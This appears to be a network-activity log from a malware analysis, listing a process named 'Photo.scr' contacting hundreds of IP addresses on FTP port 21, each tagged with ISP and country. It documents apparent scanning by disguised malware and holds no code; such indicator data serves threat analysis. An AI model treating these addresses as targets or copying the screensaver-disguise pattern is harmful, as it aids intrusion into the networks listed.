2956 Photo.scr 60.36.35.0:21 NTT Communications Corporation JP unknown
2956 Photo.scr 71.187.241.0:21 MCI Communications Services, Inc. d/b/a Verizon Business US unknown
2956 Photo.scr 62.108.170.0:21 Technical University of Koszalin PL unknown
2956 Photo.scr 164.210.221.0:21 US unknown
2956 Photo.scr 7.101.208.0:21 US unknown
2956 Photo.scr 109.13.227.0:21 SFR FR unknown
2956 Photo.scr 175.251.25.0:21 Korea Telecom KR unknown
2956 Photo.scr 109.48.223.0:21 Nos Comunicacoes, S.A. PT unknown
2956 Photo.scr 213.53.21.0:21 MCI Communications Services, Inc. d/b/a Verizon Business NL unknown
2956 Photo.scr 78.131.100.0:21 DIGI Tavkozlesi es Szolgaltato Kft. HU unknown
2956 Photo.scr 80.112.151.0:21 Ziggo NL unknown
2956 Photo.scr 106.77.41.0:21 Idea Cellular Limited IN unknown
2956 Photo.scr 113.246.13.0:21 No.31,Jin-rong Street CN unknown
2956 Photo.scr 61.173.250.0:21 China Telecom (Group) CN unknown
2956 Photo.scr 26.6.23.0:21 US unknown
2956 Photo.scr 17.119.19.0:21 Apple Inc. US unknown
2956 Photo.scr 204.221.79.0:21 Onvoy US unknown
2956 Photo.scr 168.18.37.0:21 Kennesaw State University US unknown
2956 Photo.scr 18.88.54.0:21 Massachusetts Institute of Technology US unknown
2956 Photo.scr 215.186.255.0:21 US unknown
2956 Photo.scr 213.38.131.0:21 CW Vodafone Group PLC –– unknown
2956 Photo.scr 25.10.116.0:21 GB unknown
2956 Photo.scr 17.206.162.0:21 Apple Inc. US unknown
2956 Photo.scr 56.69.157.0:21 US unknown
2956 Photo.scr 43.52.159.0:21 JP unknown
2956 Photo.scr 86.15.86.0:21 Virgin Media Limited GB unknown
2956 Photo.scr 173.29.224.0:21 Mediacom Communications Corp US unknown
2956 Photo.scr 172.213.128.0:21 AOL Transit Data Network GB unknown
2956 Photo.scr 106.207.17.0:21 Bharti Airtel Ltd. AS for GPRS Service IN unknown
2956 Photo.scr 39.125.253.0:21 SK Broadband Co Ltd KR unknown
2956 Photo.scr 28.138.35.0:21 US unknown
2956 Photo.scr 36.115.24.0:21 CN unknown
2956 Photo.scr 209.38.5.0:21 US unknown
2956 Photo.scr 115.17.195.0:21 Korea Telecom KR unknown
2956 Photo.scr 6.112.56.0:21 US unknown
2956 Photo.scr 156.241.180.0:21 MacroLAN ZA unknown
2956 Photo.scr 142.112.95.0:21 Bell Canada CA unknown
2956 Photo.scr 179.21.57.0:21 VE unknown
2956 Photo.scr 116.195.66.0:21 CN unknown
2956 Photo.scr 60.26.169.0:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 41.247.66.0:21 SAIX-NET ZA unknown
2956 Photo.scr 47.181.235.0:21 Frontier Communications of America, Inc. US unknown
2956 Photo.scr 113.49.154.0:21 BEIJING SHENZHOU GREATWALL COMMUNICATION CN unknown
2956 Photo.scr 152.219.228.0:21 US unknown
2956 Photo.scr 110.187.37.0:21 No.31,Jin-rong Street CN unknown
2956 Photo.scr 213.139.0.0:21 EASYNET Easynet Global Services ES unknown
2956 Photo.scr 75.231.69.0:21 Cellco Partnership DBA Verizon Wireless US unknown
2956 Photo.scr 165.211.152.0:21 CM unknown
2956 Photo.scr 68.227.27.0:21 Cox Communications Inc. US unknown
2956 Photo.scr 132.26.216.0:21 754th Electronic Systems Group US unknown
2956 Photo.scr 20.212.57.0:21 US unknown
2956 Photo.scr 136.74.255.0:21 US unknown
2956 Photo.scr 40.64.40.0:21 Microsoft Corporation US unknown
2956 Photo.scr 79.76.179.0:21 Tiscali UK Limited GB unknown
2956 Photo.scr 148.213.160.0:21 Universidad de Colima MX unknown
2956 Photo.scr 5.215.249.0:21 Mobile Communication Company of Iran PLC IR unknown
2956 Photo.scr 26.133.231.0:21 US unknown
2956 Photo.scr 68.148.207.0:21 Shaw Communications Inc. CA unknown
2956 Photo.scr 63.146.231.0:21 Qwest Communications Company, LLC US unknown
2956 Photo.scr 156.148.152.0:21 Consortium GARR IT unknown
2956 Photo.scr 152.99.232.0:21 National Computing and information Service KR unknown
2956 Photo.scr 115.88.31.0:21 LG DACOM Corporation KR unknown
2956 Photo.scr 63.181.216.0:21 Sprint US unknown
2956 Photo.scr 20.84.17.0:21 US unknown
2956 Photo.scr 54.67.217.0:21 US unknown
2956 Photo.scr 54.51.214.0:21 US unknown
2956 Photo.scr 51.159.90.0:21 GB unknown
2956 Photo.scr 131.131.191.0:21 Computer Sciences Corp - NTIS US unknown
2956 Photo.scr 187.123.241.0:21 CLARO S.A. BR unknown
2956 Photo.scr 3.138.206.0:21 US unknown
2956 Photo.scr 68.203.237.0:21 Time Warner Cable Internet LLC US unknown
2956 Photo.scr 85.197.172.0:21 Bredband i Kristianstad AB SE unknown
2956 Photo.scr 208.72.162.0:21 Off Campus Telecommunications US unknown
2956 Photo.scr 100.46.210.0:21 Wayport, Inc. US unknown
2956 Photo.scr 80.75.186.0:21 Etisalat Misr EG unknown
2956 Photo.scr 78.207.63.0:21 Free SAS FR unknown
2956 Photo.scr 40.42.159.0:21 Eli Lilly and Company US unknown
2956 Photo.scr 203.255.242.0:21 Ssangyong KR unknown
2956 Photo.scr 136.196.37.0:21 US unknown
2956 Photo.scr 97.198.48.0:21 Cellco Partnership DBA Verizon Wireless US unknown
2956 Photo.scr 179.158.75.0:21 CLARO S.A. BR unknown
2956 Photo.scr 30.66.58.0:21 US unknown
2956 Photo.scr 171.226.193.0:21 Viettel Corporation VN unknown
2956 Photo.scr 70.213.76.0:21 Cellco Partnership DBA Verizon Wireless US unknown
2956 Photo.scr 50.97.64.0:21 SoftLayer Technologies Inc. US unknown
2956 Photo.scr 114.109.63.0:21 True Internet Co.,Ltd. TH unknown
2956 Photo.scr 194.26.113.0:21 EASYNET Easynet Global Services NL unknown
2956 Photo.scr 155.46.86.0:21 US unknown
2956 Photo.scr 94.27.246.0:21 Magyar Telekom plc. HU unknown
2956 Photo.scr 14.23.163.0:21 No.31,Jin-rong Street CN unknown
2956 Photo.scr 168.30.217.0:21 Kennesaw State University US unknown
2956 Photo.scr 79.186.47.0:21 Orange Polska Spolka Akcyjna PL unknown
2956 Photo.scr 125.147.156.0:21 Korea Telecom KR unknown
2956 Photo.scr 2.142.32.0:21 Telefonica De Espana ES unknown
2956 Photo.scr 211.46.38.0:21 Korea Telecom KR unknown
2956 Photo.scr 189.227.61.0:21 Uninet S.A. de C.V. MX unknown
2956 Photo.scr 144.161.164.0:21 US unknown
2956 Photo.scr 12.152.40.0:21 AT&T Services, Inc. US unknown
2956 Photo.scr 29.181.221.0:21 US unknown
2956 Photo.scr 55.98.237.0:21 DoD Network Information Center US unknown
2956 Photo.scr 193.31.78.0:21 –– unknown
2956 Photo.scr 205.135.53.0:21 US unknown
2956 Photo.scr 141.74.238.0:21 Verein zur Foerderung eines Deutschen Forschungsnetzes e.V. DE unknown
2956 Photo.scr 70.203.167.0:21 Cellco Partnership DBA Verizon Wireless US unknown
2956 Photo.scr 200.110.45.0:21 AMERICATEL PERU S.A. PE unknown
2956 Photo.scr 13.111.190.0:21 US unknown
2956 Photo.scr 112.115.100.0:21 No.31,Jin-rong Street CN unknown
2956 Photo.scr 87.114.10.0:21 British Telecommunications PLC GB unknown
2956 Photo.scr 28.112.19.0:21 US unknown
2956 Photo.scr 156.153.196.0:21 Hewlett-Packard Company US unknown
2956 Photo.scr 65.15.146.0:21 AT&T Services, Inc. US unknown
2956 Photo.scr 32.155.82.0:21 AT&T Global Network Services, LLC US unknown
2956 Photo.scr 61.76.69.0:21 Korea Telecom KR unknown
2956 Photo.scr 25.78.8.0:21 GB unknown
2956 Photo.scr 177.8.125.0:21 Roveri Opção Provedor de Acesso a Internet Ltda ME BR unknown
2956 Photo.scr 30.164.0.0:21 US unknown
2956 Photo.scr 168.205.91.0:21 J de AB LAGO TECNOLOGIA ME BR unknown
2956 Photo.scr 83.42.75.0:21 Telefonica De Espana ES unknown
2956 Photo.scr 29.231.152.0:21 US unknown
2956 Photo.scr 165.158.226.0:21 Level 3 Communications, Inc. US unknown
2956 Photo.scr 47.169.54.0:21 Frontier Communications of America, Inc. US unknown
2956 Photo.scr 193.198.245.0:21 Croatian Academic and Research Network HR unknown
2956 Photo.scr 131.48.128.0:21 754th Electronic Systems Group US unknown
2956 Photo.scr 35.67.198.0:21 Merit Network Inc. US unknown
2956 Photo.scr 184.185.9.0:21 Cox Communications Inc. US unknown
2956 Photo.scr 32.118.35.0:21 AT&T Global Network Services, LLC US unknown
2956 Photo.scr 80.23.38.0:21 Telecom Italia IT unknown
2956 Photo.scr 101.61.101.0:21 BSES TeleCom Limited IN unknown
2956 Photo.scr 145.32.190.0:21 MCI Communications Services, Inc. d/b/a Verizon Business NL unknown
2956 Photo.scr 54.54.51.0:21 US unknown
2956 Photo.scr 184.147.10.0:21 Bell Canada CA unknown
2956 Photo.scr 206.52.121.0:21 NTT America, Inc. US unknown
2956 Photo.scr 126.174.249.0:21 Softbank BB Corp. JP unknown
2956 Photo.scr 139.42.155.0:21 US unknown
2956 Photo.scr 190.68.162.0:21 COLOMBIA TELECOMUNICACIONES S.A. ESP CO unknown
2956 Photo.scr 220.44.16.0:21 Softbank BB Corp. JP unknown
2956 Photo.scr 51.67.92.0:21 GB unknown
2956 Photo.scr 130.139.81.0:21 NL unknown
2956 Photo.scr 150.205.200.0:21 CH unknown
2956 Photo.scr 124.74.129.0:21 China Telecom (Group) CN unknown
2956 Photo.scr 123.88.149.0:21 China TieTong Telecommunications Corporation CN unknown
2956 Photo.scr 78.57.89.0:21 Telia Lietuva, AB LT unknown
2956 Photo.scr 213.188.60.0:21 mhs internet AG CH unknown
2956 Photo.scr 179.71.151.0:21 Telemar Norte Leste S.A. BR unknown
2956 Photo.scr 27.116.159.0:21 ABN KR unknown
2956 Photo.scr 96.192.147.0:21 Comcast Cable Communications, LLC US unknown
2956 Photo.scr 98.196.7.0:21 Comcast Cable Communications, LLC US unknown
2956 Photo.scr 17.79.16.0:21 Apple Inc. US unknown
2956 Photo.scr 114.129.66.0:21 CJ-HELLOVISION KR unknown
2956 Photo.scr 21.18.86.0:21 US unknown
2956 Photo.scr 181.56.206.0:21 Telmex Colombia S.A. CO unknown
2956 Photo.scr 205.135.80.0:21 US unknown
2956 Photo.scr 213.126.7.0:21 Ziggo NL unknown
2956 Photo.scr 27.6.92.0:21 Hathway IP Over Cable Internet IN unknown
2956 Photo.scr 123.13.57.0:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 170.153.103.0:21 CERIDIAN US unknown
2956 Photo.scr 52.116.0.0:21 US unknown
2956 Photo.scr 203.153.175.0:21 Internet Solution & Service Provider Co., Ltd. TH unknown
2956 Photo.scr 153.200.193.0:21 NTT Communications Corporation JP unknown
2956 Photo.scr 108.229.190.0:21 AT&T Services, Inc. US unknown
2956 Photo.scr 212.19.145.0:21 JSC Kazakhtelecom KZ unknown
2956 Photo.scr 199.57.213.0:21 DoD Network Information Center US unknown
2956 Photo.scr 79.77.181.0:21 Tiscali UK Limited GB unknown
2956 Photo.scr 29.105.56.0:21 US unknown
2956 Photo.scr 202.79.2.0:21 NTT Communications Corporation JP unknown
2956 Photo.scr 50.193.176.0:21 Comcast Cable Communications, LLC US unknown
2956 Photo.scr 133.131.251.0:21 NTT-ME Corporation JP unknown
2956 Photo.scr 39.250.230.0:21 PT. Telekomunikasi Selular ID unknown
2956 Photo.scr 210.166.10.0:21 ARTERIA Networks Corporation JP unknown
2956 Photo.scr 64.163.171.0:21 AT&T Internet Services US unknown
2956 Photo.scr 29.220.67.0:21 US unknown
2956 Photo.scr 32.100.19.0:21 AT&T Services, Inc. US unknown
2956 Photo.scr 14.220.18.0:21 CHINANET Guangdong province Dongguan MAN network CN unknown
2956 Photo.scr 200.8.94.0:21 Corporación Telemic C.A. VE unknown
2956 Photo.scr 41.30.60.0:21 VODACOM- ZA unknown
2956 Photo.scr 12.228.235.0:21 AT&T Services, Inc. US unknown
2956 Photo.scr 110.73.36.0:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 191.114.206.0:21 TELEFÓNICA CHILE S.A. CL unknown
2956 Photo.scr 189.215.72.0:21 Cablemas Telecomunicaciones SA de CV MX unknown
2956 Photo.scr 191.80.20.0:21 Telefonica de Argentina AR unknown
2956 Photo.scr 175.234.143.0:21 Korea Telecom KR unknown
2956 Photo.scr 183.56.206.0:21 No.31,Jin-rong Street CN unknown
2956 Photo.scr 178.26.8.0:21 Vodafone Kabel Deutschland GmbH DE unknown
2956 Photo.scr 145.19.112.0:21 SURFnet bv NL unknown
2956 Photo.scr 60.216.7.0:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 118.236.34.0:21 So-net Entertainment Corporation JP unknown
2956 Photo.scr 97.69.102.0:21 US unknown
2956 Photo.scr 198.181.175.0:21 US unknown
2956 Photo.scr 126.249.107.0:21 Softbank BB Corp. JP unknown
2956 Photo.scr 63.72.78.0:21 MCI Communications Services, Inc. d/b/a Verizon Business US unknown
2956 Photo.scr 170.125.175.0:21 CITY OF MADISON US unknown
2956 Photo.scr 134.144.142.0:21 AU unknown
2956 Photo.scr 128.187.72.0:21 Brigham Young University US unknown
2956 Photo.scr 117.10.213.0:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 83.236.16.0:21 QSC AG DE unknown
2956 Photo.scr 188.105.51.0:21 Vodafone GmbH DE unknown
2956 Photo.scr 139.44.63.0:21 AU unknown
2956 Photo.scr 159.126.104.0:21 US unknown
2956 Photo.scr 122.190.18.0:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 183.183.167.0:21 Kyocera Communication Systems Co., Ltd. JP unknown
2956 Photo.scr 46.178.246.0:21 Proximus NV BE unknown
2956 Photo.scr 183.247.239.0:21 China Mobile communications corporation CN unknown
2956 Photo.scr 206.196.252.0:21 US unknown
2956 Photo.scr 167.149.21.0:21 CH unknown
2956 Photo.scr 131.85.210.0:21 US unknown
2956 Photo.scr 218.188.153.0:21 Hutchison Global Communications HK unknown
2956 Photo.scr 28.113.116.0:21 US unknown
2956 Photo.scr 81.237.88.0:21 Telia Company AB SE unknown
2956 Photo.scr 62.103.120.0:21 OTEnet S.A. GR unknown
2956 Photo.scr 74.180.169.0:21 AT&T Services, Inc. US unknown
2956 Photo.scr 146.6.245.0:21 University of Texas at Austin US unknown
2956 Photo.scr 78.32.81.0:21 Entanet GB unknown
2956 Photo.scr 70.184.162.0:21 Cox Communications Inc. US unknown
2956 Photo.scr 95.197.156.0:21 Telia Company AB SE unknown
2956 Photo.scr 120.61.38.0:21 Mahanagar Telephone Nigam Limited IN unknown
2956 Photo.scr 18.5.240.0:21 Massachusetts Institute of Technology US unknown
2956 Photo.scr 64.28.122.0:21 AccessLine Communications Corp. US unknown
2956 Photo.scr 14.17.16.0:21 China Telecom (Group) CN unknown
2956 Photo.scr 87.114.86.0:21 British Telecommunications PLC GB unknown
2956 Photo.scr 193.141.192.0:21 British Telecommunications plc DE unknown
2956 Photo.scr 145.210.237.0:21 SURFnet bv NL unknown
2956 Photo.scr 77.49.226.0:21 Forthnet GR unknown
2956 Photo.scr 207.223.231.0:21 Earthlink, Inc. US unknown
2956 Photo.scr 174.216.160.0:21 Cellco Partnership DBA Verizon Wireless US unknown
2956 Photo.scr 202.231.150.0:21 Energia Communications, Inc. JP unknown
2956 Photo.scr 78.190.105.0:21 Turk Telekom TR unknown
2956 Photo.scr 105.102.179.0:21 Telecom Algeria DZ unknown
2956 Photo.scr 105.60.179.0:21 SAFARICOM-LIMITED KE unknown
2956 Photo.scr 110.213.175.0:21 China TieTong Telecommunications Corporation CN unknown
2956 Photo.scr 140.200.179.0:21 REANNZ National Research and Education Network NZ unknown
2956 Photo.scr 89.226.193.0:21 Completel FR unknown
2956 Photo.scr 172.175.235.0:21 AOL Transit Data Network US unknown
2956 Photo.scr 24.98.88.0:21 Comcast Cable Communications, LLC US unknown
2956 Photo.scr 61.72.213.0:21 Korea Telecom KR unknown
2956 Photo.scr 36.227.0.0:21 Data Communication Business Group TW unknown
2956 Photo.scr 6.47.230.0:21 US unknown
2956 Photo.scr 77.113.155.0:21 Polkomtel Sp. z o.o. PL unknown
2956 Photo.scr 210.102.115.0:21 KERIS KR unknown
2956 Photo.scr 180.219.120.0:21 SmarTone Mobile Communications Ltd HK unknown
2956 Photo.scr 83.36.219.0:21 Telefonica De Espana ES unknown
2956 Photo.scr 68.217.203.0:21 BellSouth.net Inc. US unknown
2956 Photo.scr 179.99.222.0:21 TELEFÔNICA BRASIL S.A BR unknown
2956 Photo.scr 136.53.170.0:21 Google Fiber Inc. US unknown
2956 Photo.scr 191.2.21.0:21 Telemar Norte Leste S.A. BR unknown
2956 Photo.scr 196.253.80.0:21 PUKNET ZA unknown
2956 Photo.scr 26.7.254.0:21 US unknown
2956 Photo.scr 77.227.82.0:21 Vodafone Spain ES unknown
2956 Photo.scr 172.49.59.0:21 T-Mobile USA, Inc. US unknown
2956 Photo.scr 209.134.221.0:21 CSAA Insurance Exchange US unknown
2956 Photo.scr 19.159.217.0:21 US unknown
2956 Photo.scr 119.135.27.0:21 No.31,Jin-rong Street CN unknown
2956 Photo.scr 112.22.60.0:21 China Mobile communications corporation CN unknown
2956 Photo.scr 53.236.218.0:21 Daimler AG DE unknown
2956 Photo.scr 103.146.174.0:21 –– unknown
2956 Photo.scr 63.163.198.0:21 Sprint US unknown
2956 Photo.scr 37.228.187.0:21 Telekommunikation Lindau (B) GmbH DE unknown
2956 Photo.scr 44.230.157.0:21 University of California, San Diego US unknown
2956 Photo.scr 18.207.190.0:21 US unknown
2956 Photo.scr 114.41.163.0:21 Data Communication Business Group TW unknown
2956 Photo.scr 61.13.98.0:21 SG unknown
2956 Photo.scr 45.113.50.0:21 INTMANAGEMENT Corp. KR unknown
2956 Photo.scr 130.17.227.0:21 California State University, Office of the Chancellor US unknown
2956 Photo.scr 4.216.141.0:21 Level 3 Communications, Inc. US unknown
2956 Photo.scr 124.19.52.0:21 SingTel Optus Pty Ltd AU unknown
2956 Photo.scr 78.209.241.0:21 Free SAS FR unknown
2956 Photo.scr 47.212.54.0:21 Suddenlink Communications US unknown
2956 Photo.scr 202.233.104.0:21 JP unknown
2956 Photo.scr 92.190.66.0:21 Orange Espagne SA ES unknown
2956 Photo.scr 55.135.67.0:21 Headquarters, USAISC US unknown
2956 Photo.scr 153.67.73.0:21 NCR Corporation US unknown
2956 Photo.scr 96.124.96.0:21 Comcast Cable Communications, LLC US unknown
2956 Photo.scr 17.13.47.0:21 Apple Inc. US unknown
2956 Photo.scr 46.199.155.0:21 Cyprus Telecommunications Authority CY unknown
2956 Photo.scr 39.79.236.0:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 201.99.234.0:21 Uninet S.A. de C.V. MX unknown
2956 Photo.scr 20.164.159.0:21 Microsoft Corporation US unknown
2956 Photo.scr 37.50.227.0:21 Deutsche Telekom AG DE unknown
2956 Photo.scr 132.221.150.0:21 Bell Canada CA unknown
2956 Photo.scr 79.177.70.0:21 Bezeq International IL unknown
2956 Photo.scr 96.139.86.0:21 Comcast Cable Communications, LLC US unknown
2956 Photo.scr 72.213.135.0:21 Cox Communications Inc. US unknown
2956 Photo.scr 20.160.105.0:21 Microsoft Corporation US unknown
2956 Photo.scr 124.78.206.0:21 China Telecom (Group) CN unknown
2956 Photo.scr 19.217.32.0:21 US unknown
2956 Photo.scr 202.236.178.0:21 Research Organization of Information and Systems, National Institute of Informatics JP unknown
2956 Photo.scr 5.56.15.0:21 NVENTA SRL IT unknown
2956 Photo.scr 63.156.45.0:21 Qwest Communications Company, LLC US unknown
2956 Photo.scr 118.76.191.0:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 30.146.217.0:21 US unknown
2956 Photo.scr 155.38.193.0:21 US unknown
2956 Photo.scr 108.193.231.0:21 AT&T Services, Inc. US unknown
2956 Photo.scr 187.71.106.0:21 Claro S/A BR unknown
2956 Photo.scr 202.245.140.0:21 JP unknown
2956 Photo.scr 162.15.57.0:21 California Technology Agency US unknown
2956 Photo.scr 208.57.35.0:21 Telepacific Communications US unknown
2956 Photo.scr 210.246.230.0:21 Samart Corporation Co., Ltd. TH unknown
2956 Photo.scr 98.90.240.0:21 AT&T Services, Inc. US unknown
2956 Photo.scr 87.142.84.0:21 Deutsche Telekom AG DE unknown
2956 Photo.scr 124.169.184.0:21 Internode Pty Ltd AU unknown
2956 Photo.scr 123.231.213.0:21 ID unknown
2956 Photo.scr 163.179.98.0:21 China Unicom IP network China169 Guangdong province CN unknown
2956 Photo.scr 108.67.79.0:21 AT&T Services, Inc. US unknown
2956 Photo.scr 30.197.212.0:21 US unknown
2956 Photo.scr 189.233.111.0:21 Uninet S.A. de C.V. MX unknown
2956 Photo.scr 36.184.226.0:21 Guangdong Mobile Communication Co.Ltd. CN unknown
2956 Photo.scr 178.170.83.0:21 Ikoula Net SAS ES unknown
2956 Photo.scr 86.46.1.0:21 Eircom IE unknown
2956 Photo.scr 114.106.131.0:21 No.31,Jin-rong Street CN unknown
2956 Photo.scr 208.159.148.0:21 Savvis US unknown
2956 Photo.scr 167.62.188.0:21 Administracion Nacional de Telecomunicaciones UY unknown
2956 Photo.scr 34.158.147.0:21 US unknown
2956 Photo.scr 148.158.203.0:21 US unknown
2956 Photo.scr 77.54.227.0:21 Vodafone Portugal - Communicacoes Pessoais S.A. PT unknown
2956 Photo.scr 133.178.74.0:21 JP unknown
2956 Photo.scr 182.123.238.0:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 164.194.192.0:21 US unknown
2956 Photo.scr 79.112.128.0:21 RCS & RDS RO unknown
2956 Photo.scr 65.206.215.0:21 MCI Communications Services, Inc. d/b/a Verizon Business US unknown
2956 Photo.scr 136.191.73.0:21 US unknown
2956 Photo.scr 177.112.63.0:21 TELEFÔNICA BRASIL S.A BR unknown
2956 Photo.scr 139.2.2.0:21 Materna GmbH Information and Communications DE unknown
2956 Photo.scr 58.54.54.1:21 No.31,Jin-rong Street CN unknown
2956 Photo.scr 220.77.98.1:21 Korea Telecom KR unknown
2956 Photo.scr 220.151.100.1:21 UCOM Corp. JP unknown
2956 Photo.scr 10.102.183.1:21 –– unknown
2956 Photo.scr 180.141.185.1:21 No.31,Jin-rong Street CN unknown
2956 Photo.scr 124.2.166.1:21 SK Telecom KR unknown
2956 Photo.scr 161.125.237.1:21 US unknown
2956 Photo.scr 68.74.240.1:21 Swedish Covenant Hospital US unknown
2956 Photo.scr 26.114.14.1:21 US unknown
2956 Photo.scr 110.191.48.1:21 No.31,Jin-rong Street CN unknown
2956 Photo.scr 74.113.227.1:21 US unknown
2956 Photo.scr 119.66.91.1:21 LG POWERCOMM KR unknown
2956 Photo.scr 198.113.220.1:21 Level 3 Communications, Inc. US unknown
2956 Photo.scr 190.22.72.1:21 TELEFÓNICA CHILE S.A. CL unknown
2956 Photo.scr 59.200.147.1:21 CN unknown
2956 Photo.scr 139.28.198.1:21 –– unknown
2956 Photo.scr 79.76.66.1:21 Tiscali UK Limited GB unknown
2956 Photo.scr 220.193.158.1:21 CN unknown
2956 Photo.scr 85.192.214.1:21 Teloise FR unknown
2956 Photo.scr 200.127.136.1:21 Prima S.A. AR unknown
2956 Photo.scr 112.68.36.1:21 K-Opticom Corporation JP unknown
2956 Photo.scr 183.81.40.1:21 The Corporation for Financing & Promoting Technology VN unknown
2956 Photo.scr 83.30.227.1:21 Orange Polska Spolka Akcyjna PL unknown
2956 Photo.scr 136.49.72.1:21 Google Fiber Inc. US unknown
2956 Photo.scr 79.114.136.1:21 RCS & RDS RO unknown
2956 Photo.scr 147.217.155.1:21 Headquarters, USAISC US unknown
2956 Photo.scr 175.132.159.1:21 KDDI CORPORATION JP unknown
2956 Photo.scr 111.192.5.1:21 China Unicom Beijing Province Network CN unknown
2956 Photo.scr 207.40.84.1:21 Embarq Corporation US unknown
2956 Photo.scr 12.198.242.1:21 AT&T Services, Inc. US unknown
2956 Photo.scr 192.126.153.1:21 BigTip, Inc. US unknown
2956 Photo.scr 153.247.248.1:21 NTT Communications Corporation JP unknown
2956 Photo.scr 45.245.17.1:21 LINKdotNET EG unknown
2956 Photo.scr 43.190.37.1:21 JP unknown
2956 Photo.scr 110.29.178.1:21 Far EastTone Telecommunication Co., Ltd. TW unknown
2956 Photo.scr 17.95.70.1:21 Apple Inc. US unknown
2956 Photo.scr 109.134.146.1:21 Proximus NV BE unknown
2956 Photo.scr 136.103.244.1:21 US unknown
2956 Photo.scr 211.195.58.1:21 Korea Telecom KR unknown
2956 Photo.scr 164.125.216.1:21 Pusan National University KR unknown
2956 Photo.scr 42.53.52.1:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 107.2.237.1:21 Comcast Cable Communications, LLC US unknown
2956 Photo.scr 200.74.11.1:21 VTR BANDA ANCHA S.A. CL unknown
2956 Photo.scr 60.109.86.1:21 Softbank BB Corp. JP unknown
2956 Photo.scr 35.189.83.1:21 Google Inc. US unknown
2956 Photo.scr 159.125.142.1:21 US unknown
2956 Photo.scr 77.122.166.1:21 Volia UA unknown
2956 Photo.scr 59.215.21.1:21 CN unknown
2956 Photo.scr 75.91.129.1:21 Windstream Communications Inc US unknown
2956 Photo.scr 145.188.178.1:21 SURFnet bv NL unknown
2956 Photo.scr 192.211.238.1:21 VINAKOM COMMUNICATIONS US unknown
2956 Photo.scr 212.142.212.1:21 Euskaltel S.A. ES unknown
2956 Photo.scr 223.87.7.1:21 Guangdong Mobile Communication Co.Ltd. CN unknown
2956 Photo.scr 194.224.150.1:21 Telefonica De Espana ES unknown
2956 Photo.scr 218.120.167.1:21 Softbank BB Corp. JP unknown
2956 Photo.scr 1.26.181.1:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 78.126.70.1:21 SFR FR unknown
2956 Photo.scr 84.201.111.1:21 DTS Systeme GmbH DE unknown
2956 Photo.scr 179.217.205.1:21 CLARO S.A. BR unknown
2956 Photo.scr 68.23.28.1:21 AT&T Services, Inc. US unknown
2956 Photo.scr 62.139.84.1:21 Etisalat Misr EG unknown
2956 Photo.scr 150.106.225.1:21 Telenor Norge AS NO unknown
2956 Photo.scr 214.145.149.1:21 DoD Network Information Center US unknown
2956 Photo.scr 31.80.88.1:21 EE Limited GB unknown
2956 Photo.scr 28.113.195.1:21 US unknown
2956 Photo.scr 25.51.136.1:21 GB unknown
2956 Photo.scr 15.232.212.1:21 Hewlett-Packard Company US unknown
2956 Photo.scr 101.183.181.1:21 Telstra Pty Ltd AU unknown
2956 Photo.scr 153.110.169.1:21 EVRY AS NO unknown
2956 Photo.scr 27.12.205.1:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 201.253.4.1:21 Telecom Argentina S.A. AR unknown
2956 Photo.scr 138.89.115.1:21 MCI Communications Services, Inc. d/b/a Verizon Business US unknown
2956 Photo.scr 153.217.179.1:21 NTT Communications Corporation JP unknown
2956 Photo.scr 35.89.42.1:21 Merit Network Inc. US unknown
2956 Photo.scr 192.41.179.1:21 JP unknown
2956 Photo.scr 48.84.124.1:21 US unknown
2956 Photo.scr 222.98.73.1:21 Korea Telecom KR unknown
2956 Photo.scr 85.135.122.1:21 PODA a.s. CZ unknown
2956 Photo.scr 105.10.187.1:21 CELL-C ZA unknown
2956 Photo.scr 120.1.53.1:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 32.180.191.1:21 AT&T Global Network Services, LLC US unknown
2956 Photo.scr 218.44.128.1:21 NTT Communications Corporation JP unknown
2956 Photo.scr 87.213.71.1:21 Tele 2 Nederland B.V. NL unknown
2956 Photo.scr 195.123.123.1:21 MOBICOM Ltd. UA unknown
2956 Photo.scr 198.168.131.1:21 McGill University CA unknown
2956 Photo.scr 91.55.135.1:21 Deutsche Telekom AG DE unknown
2956 Photo.scr 134.187.76.1:21 California Technology Agency US unknown
2956 Photo.scr 202.25.200.1:21 Energia Communications, Inc. JP unknown
2956 Photo.scr 143.217.251.1:21 E.ON Business Services GmbH SE unknown
2956 Photo.scr 22.163.252.1:21 US unknown
2956 Photo.scr 166.248.61.1:21 Cellco Partnership DBA Verizon Wireless US unknown
2956 Photo.scr 145.27.244.1:21 NL unknown
2956 Photo.scr 167.96.69.1:21 Louisiana State University US unknown
2956 Photo.scr 45.90.28.1:21 –– unknown
2956 Photo.scr 111.245.131.1:21 Data Communication Business Group TW unknown
2956 Photo.scr 206.30.244.1:21 Savvis US unknown
2956 Photo.scr 147.154.188.1:21 US unknown
2956 Photo.scr 11.184.200.1:21 US unknown
2956 Photo.scr 113.178.55.1:21 VNPT Corp VN unknown
2956 Photo.scr 117.132.134.1:21 China Mobile communications corporation CN unknown
2956 Photo.scr 79.248.137.1:21 Deutsche Telekom AG DE unknown
2956 Photo.scr 169.5.127.1:21 3M Company US unknown
2956 Photo.scr 212.175.242.1:21 Turk Telekom TR unknown
2956 Photo.scr 70.101.232.1:21 Frontier Communications of America, Inc. US unknown
2956 Photo.scr 156.84.183.1:21 Wal-Mart Stores, Inc. US unknown
2956 Photo.scr 203.34.219.1:21 AU unknown
2956 Photo.scr 166.227.220.1:21 UNITED STATES CELLULAR TELEPHONE COMPANY (GREATER KNOXVILLE), L.P. US unknown
2956 Photo.scr 217.242.160.1:21 Deutsche Telekom AG DE unknown
2956 Photo.scr 10.81.79.1:21 –– unknown
2956 Photo.scr 81.215.108.1:21 Turk Telekom TR unknown
2956 Photo.scr 166.226.20.1:21 UNITED STATES CELLULAR TELEPHONE COMPANY (GREATER KNOXVILLE), L.P. US unknown
2956 Photo.scr 97.79.242.1:21 Time Warner Cable Internet LLC US unknown
2956 Photo.scr 111.113.181.1:21 No.31,Jin-rong Street CN unknown
